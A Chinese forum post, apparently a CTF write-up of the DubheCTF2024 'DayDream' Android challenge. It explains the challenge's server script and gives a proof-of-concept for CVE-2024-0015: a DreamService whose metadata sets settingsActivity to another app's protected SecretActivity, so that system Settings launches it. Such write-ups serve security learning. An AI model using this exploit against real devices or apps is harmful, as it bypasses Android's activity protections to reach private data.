赛题处理

jadx打开，一共有三部分

MainActivity，没什么信息
FlagReceiver，提供了一个能够接收flag的广播
SecretActivity，提供了一个readFile能够获取flag
很明显，只要调用了SecretActivity，就可以得到flag。再结合上面对于CVE的说明，答案已经呼之欲出了

不过不急，我们再看看server.py，这个文件也是在给我们提示怎么做

server.py解读

由于我是环境关了以后复现，题目docker又缺文件，然后我改server.py又发现模拟器莫名跑不起来。最后索性找了个android12的模拟器敲命令，唉

print_to_user("Welcome to DubheCTF2024 DayDream! Please proof of work to continue.\n")
# sha256的爆破，忘了哪个比赛放pwntools爆破的github链接来着emmm
if not proof_of_work():             
    print_to_user("Please proof of work again, exit...\n")
    exit(-1)
 
# 输入一个apk url，对于没接触过android的人来说可能不知道这是干什么
# 因为android安全中经常做的事情就是写一个AttackApk去攻击目标apk
# 所以这里需要你写的AttackApk的公网下载链接
print_to_user("Please enter your apk url:")
 
url = sys.stdin.readline().strip()
EXP_FILE = download_file(url)
# 校验下载的apk
if not check_apk(EXP_FILE):         
    print_to_user("Invalid apk file.\n")
    exit(-1)
# 启动模拟器
emulator = setup_emulator()
adb(["wait-for-device"])
 
wait_for_device_boot_complete()
# 直接给你ban咯，readme.md里有说，不过提了一嘴parcel序列化让我想起了2017的那几个洞
adb(["shell", "su", "root", "pm", "disable", "com.android.settings/.accounts.AddAccountSettings"])
# 安装目标apk
adb_install(APK_FILE)
# 启动目标apk
adb_activity(f"{VICTIM}/.MainActivity", wait=True)
# 使用广播将flag文件写入模拟器环境
with open(FLAG_FILE, "r") as f:
    adb_broadcast(f"com.tsctf.SET_FLAG", f"{VICTIM}/.FlagReceiver", extras={"flag": f.read()})
# 安装攻击apk
adb_install(EXP_FILE)
# 启动攻击apk
adb_activity(f"{ATTACKER}/.MainActivity")
# 攻击
one_click()
print_to_user("One_click finished! The logcat log will be output after 5 seconds.\n")
# 将SecretActivity的日志打印出来，如果SecretActivity被调用了，这里就会输出flag
adb(["shell","logcat -d -s SecretActivity", ">" ,"/logcat_"+ str(ADB_PORT) + ".txt"])

流程还是很正常的，关键就是one_click了

def one_click():
# 打开屏保设置页面
    adb(["shell", "am", "start", "-a", "android.settings.DREAM_SETTINGS"])
    adb(["shell", "sleep", "10"])
# 向下滑（排除误差哈哈哈）
    adb(["shell", "input", "keyevent", "KEYCODE_DPAD_DOWN"])
    adb(["shell", "sleep", "1"])
# 回车，这里就是选择屏保样式
    adb(["shell", "input", "keyevent", "KEYCODE_ENTER"])
    adb(["shell", "sleep", "5"])
# 点击对应的选项，这里就是在选择我们编写的屏保部分
    adb(["shell", "input", "tap", "675", "1415"])
    adb(["shell", "sleep", "5"])
# 点击那个最最最关键的设置按钮
    adb(["shell", "input", "tap", "1256", "842"])
    adb(["shell", "sleep", "1"])

OK，接下来我们要做的事情就是写一个apk，然后调用SecretActivity了，具体怎么写可以看上面的Dream Service 官方文档

EXP

需要注意的是题目明确了包名

DreamService

package com.tsctf.daydream;
import android.service.dreams.DreamService;
 
public class MyService extends DreamService {
 
    @Override
    public void onAttachedToWindow() {
        super.onAttachedToWindow();
 
        // Exit dream upon user touch
        setInteractive(false);
        // Hide system UI
        setFullscreen(true);
        // Set the dream layout
 
    }
}

androidmanifest.xml声明service（需要注意的是官方说了高API要申请权限）

<service
            android:name=".MyService"
            android:label="Test"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.BIND_DREAM_SERVICE">
            <intent-filter>
                <action android:name="android.service.dreams.DreamService" />
                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
            <meta-data
                android:name="android.service.dream"
                android:resource="@xml/test_dream_metadata" />
        </service>

核心的activity调用

<?xml version="1.0" encoding="utf-8"?>
<dream xmlns:android="http://schemas.android.com/apk/res/android"
    android:settingsActivity="com.tsctf.victimapp/.SecretActivity"/>

执行效果

用户名联想是历史遗留问题:(

图片描述

附件是复现视频，logcat里有那么多条是因为尝试了不止一次:(

最后附上源码地址：

https://github.com/UmVfX1BvaW50/CVE-2024-0015

好了，可以下机了，如果有什么不对的地方欢迎师傅们来拷打~~~

阿里云助力开发者！2核2G 3M带宽不限流量！6.18限时价，开发者可享99元/年，续费同价！

#漏洞相关

上传的附件：

CVE-2024-0015.zip （5.88MB，17次下载）

收藏・1

点赞・4

打赏

最新回复 (2)
LLeaves 雪币： 330 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 9 粉丝 4 关注私信	LLeaves 2024-3-19 19:37 2 楼 0 tql
秋狝雪币： 19803 活跃值： (29410) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1583 粉丝 31 关注私信	秋狝 2024-3-20 09:23 3 楼 1 感谢分享
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复